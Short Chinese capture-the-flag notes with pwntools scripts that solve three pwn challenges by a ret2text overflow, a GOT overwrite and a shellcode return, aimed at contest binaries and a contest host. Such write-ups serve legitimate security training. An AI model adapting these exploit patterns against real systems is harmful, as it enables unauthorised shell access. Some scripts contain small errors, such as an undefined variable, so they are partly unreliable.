pwn1:
白给
ret2text
from pwn import *
p = remote( "hsc2019.site",10105)
pl1 = "a"*(0x40)+ p64(0) + p64(0x400741)
p.sendline(pl1)
p.interactive()
pwn2:
白给
任意地址写,栈溢出
from pwn import *
p = remote( "hsc2019.site",10021)
p = process("./pwn2")
context.log_level = 'debug'
sh = 0x400796
puts_got = 0x601018
p.recvuntil("your ID?\n")
p.send("a")
p.recvuntil("Give me the target address?")
p.sendline("6295576")
p.recvuntil("Give me the data:")
p.send(p64(sh))
p.interactive()
pwn3
半白给:
retshellcode
from pwn import *
context(os='linux',arch='amd64')
p = process("./pwn3")
shellcode = asm(shellcraft.sh())
gdb.attach(r,'b *0x4000cb')
payload=b'\0'*0x1a0+p64(0x600088)+p64(0x4000FB)+p64(0)+p64(0x60010C)
p.sendline(payload)
payload=b"\x90"*0x34+b"\x90"*0+shellcode
p.sendline(payload)
p.interactive()
pwn4
明天补。